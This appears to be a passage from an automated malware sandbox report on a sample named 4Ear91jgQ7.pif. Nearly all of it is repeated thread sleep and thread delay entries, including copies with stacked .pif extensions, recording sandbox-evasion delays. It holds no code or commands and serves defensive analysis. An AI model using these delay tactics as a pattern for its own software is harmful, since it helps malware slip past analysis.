            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif TID: 6424Thread sleep time: -593156s >= -30000s
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif TID: 6424Thread sleep time: -593029s >= -30000s
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif TID: 6424Thread sleep time: -592890s >= -30000s
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif TID: 6424Thread sleep time: -592750s >= -30000s
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif TID: 6424Thread sleep time: -592573s >= -30000s
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif TID: 6424Thread sleep time: -592452s >= -30000s
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif TID: 6424Thread sleep time: -592315s >= -30000s
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif TID: 6424Thread sleep time: -592150s >= -30000s
            Source: C:\Program Files (x86)\CYuCmafrUiRpexSXBCfMsfHtHOSokEaicfvwTqXQ\NQKKZTlEHzDNbnTfYhwoCSpWHN.exe TID: 6512Thread sleep time: -40000s >= -30000s
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif TID: 4524Thread sleep time: -23980767295822402s >= -30000s
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif TID: 4524Thread sleep time: -600000s >= -30000s
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif TID: 2668Thread sleep count: 3855 > 30
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif TID: 4524Thread sleep time: -599812s >= -30000s
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif TID: 2668Thread sleep count: 4319 > 30
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif TID: 4524Thread sleep time: -599667s >= -30000s
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif TID: 4524Thread sleep time: -599541s >= -30000s
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif TID: 4524Thread sleep time: -599437s >= -30000s
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif TID: 4524Thread sleep time: -599328s >= -30000s
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif TID: 4524Thread sleep time: -599217s >= -30000s
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif TID: 4524Thread sleep time: -599109s >= -30000s
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif TID: 4524Thread sleep time: -598978s >= -30000s
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif TID: 4524Thread sleep time: -598850s >= -30000s
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif TID: 4524Thread sleep time: -598734s >= -30000s
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif TID: 4524Thread sleep time: -598618s >= -30000s
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif TID: 4524Thread sleep time: -598515s >= -30000s
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif TID: 4524Thread sleep time: -598393s >= -30000s
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif TID: 4524Thread sleep time: -598265s >= -30000s
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif TID: 4524Thread sleep time: -598140s >= -30000s
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif TID: 4524Thread sleep time: -597966s >= -30000s
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif TID: 4524Thread sleep time: -597845s >= -30000s
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif TID: 4524Thread sleep time: -597734s >= -30000s
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif TID: 4524Thread sleep time: -597590s >= -30000s
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif TID: 4524Thread sleep time: -597468s >= -30000s
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif TID: 4524Thread sleep time: -597336s >= -30000s
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif TID: 4524Thread sleep time: -597229s >= -30000s
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif TID: 4524Thread sleep time: -597106s >= -30000s
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif TID: 4524Thread sleep time: -597000s >= -30000s
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif TID: 4524Thread sleep time: -596888s >= -30000s
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif TID: 4524Thread sleep time: -596781s >= -30000s
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif TID: 4524Thread sleep time: -596671s >= -30000s
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif TID: 4524Thread sleep time: -596562s >= -30000s
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif TID: 4524Thread sleep time: -596452s >= -30000s
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif TID: 4524Thread sleep time: -596343s >= -30000s
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif TID: 4524Thread sleep time: -596234s >= -30000s
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif TID: 4524Thread sleep time: -596124s >= -30000s
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif TID: 4524Thread sleep time: -596015s >= -30000s
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif TID: 4524Thread sleep time: -595906s >= -30000s
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif TID: 4524Thread sleep time: -595765s >= -30000s
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif TID: 4524Thread sleep time: -595547s >= -30000s
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif TID: 4524Thread sleep time: -595434s >= -30000s
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif TID: 4524Thread sleep time: -595328s >= -30000s
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif TID: 4524Thread sleep time: -595214s >= -30000s
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif TID: 4524Thread sleep time: -595109s >= -30000s
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif TID: 4524Thread sleep time: -595000s >= -30000s
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif TID: 4524Thread sleep time: -594886s >= -30000s
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif TID: 4524Thread sleep time: -594780s >= -30000s
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif TID: 4524Thread sleep time: -594656s >= -30000s
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif TID: 4524Thread sleep time: -594546s >= -30000s
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif TID: 4524Thread sleep time: -594437s >= -30000s
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif TID: 4524Thread sleep time: -594314s >= -30000s
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif TID: 4524Thread sleep time: -594187s >= -30000s
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif TID: 2504Thread sleep time: -20291418481080494s >= -30000s
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif TID: 2504Thread sleep time: -600000s >= -30000s
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif TID: 6824Thread sleep count: 2662 > 30
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif TID: 2504Thread sleep time: -599812s >= -30000s
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif TID: 2504Thread sleep time: -599629s >= -30000s
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif TID: 2504Thread sleep time: -599503s >= -30000s
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif TID: 2504Thread sleep time: -599375s >= -30000s
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif TID: 6824Thread sleep count: 4681 > 30
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif TID: 2504Thread sleep time: -599251s >= -30000s
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif TID: 2504Thread sleep time: -599117s >= -30000s
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif TID: 2504Thread sleep time: -598996s >= -30000s
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif TID: 2504Thread sleep time: -598886s >= -30000s
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif TID: 2504Thread sleep time: -598751s >= -30000s
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif TID: 2504Thread sleep time: -598390s >= -30000s
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif TID: 2504Thread sleep time: -598234s >= -30000s
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif TID: 2504Thread sleep time: -598091s >= -30000s
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif TID: 2504Thread sleep time: -597937s >= -30000s
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif TID: 2504Thread sleep time: -597802s >= -30000s
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif TID: 2504Thread sleep time: -597656s >= -30000s
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif TID: 2504Thread sleep time: -597518s >= -30000s
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif TID: 2504Thread sleep time: -597382s >= -30000s
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif TID: 2504Thread sleep time: -597271s >= -30000s
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif TID: 2504Thread sleep time: -597124s >= -30000s
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif TID: 2504Thread sleep time: -596984s >= -30000s
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif TID: 2504Thread sleep time: -596875s >= -30000s
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif TID: 2504Thread sleep time: -596734s >= -30000s
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif TID: 2504Thread sleep time: -596591s >= -30000s
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif TID: 2504Thread sleep time: -596481s >= -30000s
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif TID: 2504Thread sleep time: -596363s >= -30000s
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif TID: 2504Thread sleep time: -596223s >= -30000s
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif TID: 2504Thread sleep time: -596094s >= -30000s
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif TID: 2504Thread sleep time: -595984s >= -30000s
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif TID: 2504Thread sleep time: -595862s >= -30000s
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif TID: 2504Thread sleep time: -595736s >= -30000s
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif TID: 2504Thread sleep time: -595609s >= -30000s
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif TID: 2504Thread sleep time: -595492s >= -30000s
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif TID: 2504Thread sleep time: -595379s >= -30000s
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif TID: 2504Thread sleep time: -595250s >= -30000s
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif TID: 2504Thread sleep time: -595139s >= -30000s
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif TID: 2504Thread sleep time: -595028s >= -30000s
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif TID: 2504Thread sleep time: -594900s >= -30000s
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif TID: 2504Thread sleep time: -594783s >= -30000s
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif TID: 2504Thread sleep time: -594656s >= -30000s
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif TID: 2504Thread sleep time: -594544s >= -30000s
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif TID: 2504Thread sleep time: -594431s >= -30000s
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif TID: 2504Thread sleep time: -594307s >= -30000s
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif TID: 2504Thread sleep time: -594045s >= -30000s
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif TID: 2504Thread sleep time: -593875s >= -30000s
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif TID: 2504Thread sleep time: -593765s >= -30000s
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif TID: 2504Thread sleep time: -593656s >= -30000s
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif TID: 2504Thread sleep time: -593547s >= -30000s
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif TID: 2504Thread sleep time: -593437s >= -30000s
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif TID: 2504Thread sleep time: -593328s >= -30000s
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif TID: 2504Thread sleep time: -593218s >= -30000s
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif TID: 2504Thread sleep time: -593107s >= -30000s
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif TID: 2504Thread sleep time: -593000s >= -30000s
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif TID: 3924Thread sleep time: -8301034833169293s >= -30000s
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif TID: 3924Thread sleep time: -600000s >= -30000s
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif TID: 1708Thread sleep count: 1876 > 30
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif TID: 3924Thread sleep time: -599610s >= -30000s
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif TID: 3924Thread sleep time: -599360s >= -30000s
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif TID: 3924Thread sleep time: -599172s >= -30000s
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif TID: 3924Thread sleep time: -599000s >= -30000s
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif TID: 3924Thread sleep time: -598782s >= -30000s
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif TID: 3924Thread sleep time: -598578s >= -30000s
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif TID: 3924Thread sleep time: -598372s >= -30000s
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif TID: 3924Thread sleep time: -598125s >= -30000s
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif TID: 3924Thread sleep time: -597922s >= -30000s
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif TID: 3924Thread sleep time: -597735s >= -30000s
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif TID: 3924Thread sleep time: -597593s >= -30000s
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif TID: 3924Thread sleep time: -597472s >= -30000s
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif TID: 3924Thread sleep time: -597328s >= -30000s
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif TID: 3924Thread sleep time: -597203s >= -30000s
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif TID: 1708Thread sleep count: 1401 > 30
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif TID: 3924Thread sleep time: -597094s >= -30000s
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif TID: 3924Thread sleep time: -596962s >= -30000s
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif TID: 3924Thread sleep time: -596835s >= -30000s
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif TID: 3924Thread sleep time: -596723s >= -30000s
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif TID: 3924Thread sleep time: -596594s >= -30000s
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif TID: 3924Thread sleep time: -596469s >= -30000s
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif TID: 3924Thread sleep time: -596357s >= -30000s
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif TID: 3924Thread sleep time: -596234s >= -30000s
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif TID: 3924Thread sleep time: -596108s >= -30000s
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif TID: 3924Thread sleep time: -595958s >= -30000s
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif TID: 3924Thread sleep time: -595826s >= -30000s
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif TID: 3924Thread sleep time: -595710s >= -30000s
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif TID: 3924Thread sleep time: -595532s >= -30000s
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif TID: 3924Thread sleep time: -595313s >= -30000s
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif TID: 3924Thread sleep time: -595032s >= -30000s
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif TID: 3924Thread sleep time: -594877s >= -30000s
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif TID: 3924Thread sleep time: -594735s >= -30000s
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif TID: 3924Thread sleep time: -594615s >= -30000s
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif TID: 3924Thread sleep time: -594453s >= -30000s
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif TID: 3924Thread sleep time: -594327s >= -30000s
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif TID: 3924Thread sleep time: -594187s >= -30000s
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif TID: 3924Thread sleep time: -594047s >= -30000s
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif TID: 3924Thread sleep time: -593874s >= -30000s
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif TID: 3924Thread sleep time: -593749s >= -30000s
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif TID: 3924Thread sleep time: -593614s >= -30000s
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif TID: 3924Thread sleep time: -593485s >= -30000s
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif TID: 3924Thread sleep time: -593360s >= -30000s
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pif TID: 2520Thread sleep time: -3689348814741908s >= -30000s
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pif TID: 2520Thread sleep time: -600000s >= -30000s
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pif TID: 3056Thread sleep count: 463 > 30
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pif TID: 2520Thread sleep time: -599844s >= -30000s
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pif TID: 2520Thread sleep time: -599688s >= -30000s
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pif TID: 2520Thread sleep time: -599484s >= -30000s
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pif TID: 2520Thread sleep time: -599334s >= -30000s
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pif TID: 2520Thread sleep time: -599141s >= -30000s
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pif TID: 2520Thread sleep time: -598986s >= -30000s
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pif TID: 2520Thread sleep time: -598846s >= -30000s
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pif TID: 2520Thread sleep time: -598719s >= -30000s
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pif TID: 2520Thread sleep time: -598577s >= -30000s
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pif TID: 2520Thread sleep time: -598203s >= -30000s
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pif TID: 2520Thread sleep time: -598000s >= -30000s
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pif TID: 2520Thread sleep time: -597828s >= -30000s
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pif TID: 3056Thread sleep count: 886 > 30
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pif TID: 2520Thread sleep time: -597707s >= -30000s
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pif TID: 2520Thread sleep time: -597578s >= -30000s
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pif TID: 2520Thread sleep time: -597452s >= -30000s
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pif TID: 2520Thread sleep time: -597340s >= -30000s
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pif TID: 2520Thread sleep time: -597223s >= -30000s
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pif TID: 2520Thread sleep time: -597093s >= -30000s
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pif TID: 2520Thread sleep time: -596906s >= -30000s
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pif TID: 2520Thread sleep time: -596797s >= -30000s
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pif TID: 2520Thread sleep time: -578422s >= -30000s
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pif TID: 5888Thread sleep count: 35 > 30
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pif TID: 5888Thread sleep time: -32281802128991695s >= -30000s
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pif TID: 5888Thread sleep time: -600000s >= -30000s
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pif TID: 4292Thread sleep count: 2305 > 30
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pif TID: 5888Thread sleep time: -599871s >= -30000s
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pif TID: 4292Thread sleep count: 6730 > 30
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pif TID: 5888Thread sleep time: -599759s >= -30000s
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pif TID: 5888Thread sleep time: -599643s >= -30000s
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pif TID: 5888Thread sleep time: -599520s >= -30000s
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pif TID: 5888Thread sleep time: -599379s >= -30000s
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pif TID: 5888Thread sleep time: -599265s >= -30000s
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pif TID: 5888Thread sleep time: -599153s >= -30000s
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pif TID: 5888Thread sleep time: -599046s >= -30000s
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pif TID: 5888Thread sleep time: -598937s >= -30000s
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pif TID: 5888Thread sleep time: -598828s >= -30000s
            Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
            Source: C:\Windows\SysWOW64\findstr.exe Last function: Thread delayed
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pif Last function: Thread delayed
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pifThread delayed: delay time: 599251
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pifThread delayed: delay time: 599117
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pifThread delayed: delay time: 598996
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pifThread delayed: delay time: 598886
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pifThread delayed: delay time: 598751
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pifThread delayed: delay time: 598390
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pifThread delayed: delay time: 598234
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pifThread delayed: delay time: 598091
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pifThread delayed: delay time: 597937
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pifThread delayed: delay time: 597802
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pifThread delayed: delay time: 597656
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pifThread delayed: delay time: 597518
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pifThread delayed: delay time: 597382
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pifThread delayed: delay time: 597271
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pifThread delayed: delay time: 597124
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pifThread delayed: delay time: 596984
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pifThread delayed: delay time: 596875
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pifThread delayed: delay time: 596734
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pifThread delayed: delay time: 596591
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pifThread delayed: delay time: 596481
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pifThread delayed: delay time: 596363
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pifThread delayed: delay time: 596223
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pifThread delayed: delay time: 596094
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pifThread delayed: delay time: 595984
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pifThread delayed: delay time: 595862
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pifThread delayed: delay time: 595736
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pifThread delayed: delay time: 595609
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pifThread delayed: delay time: 595492
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pifThread delayed: delay time: 595379
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pifThread delayed: delay time: 595250
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pifThread delayed: delay time: 595139
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pifThread delayed: delay time: 595028
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pifThread delayed: delay time: 594900
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pifThread delayed: delay time: 594783
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pifThread delayed: delay time: 594656
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pifThread delayed: delay time: 594544
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pifThread delayed: delay time: 594431
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pifThread delayed: delay time: 594307
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pifThread delayed: delay time: 594045
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pifThread delayed: delay time: 593875
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pifThread delayed: delay time: 593765
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pifThread delayed: delay time: 593656
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pifThread delayed: delay time: 593547
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pifThread delayed: delay time: 593437
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pifThread delayed: delay time: 593328
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pifThread delayed: delay time: 593218
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pifThread delayed: delay time: 593107
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pifThread delayed: delay time: 593000
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pifThread delayed: delay time: 922337203685477
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pifThread delayed: delay time: 600000
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pifThread delayed: delay time: 599610
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pifThread delayed: delay time: 599360
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pifThread delayed: delay time: 599172
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pifThread delayed: delay time: 599000
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pifThread delayed: delay time: 598782
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pifThread delayed: delay time: 598578
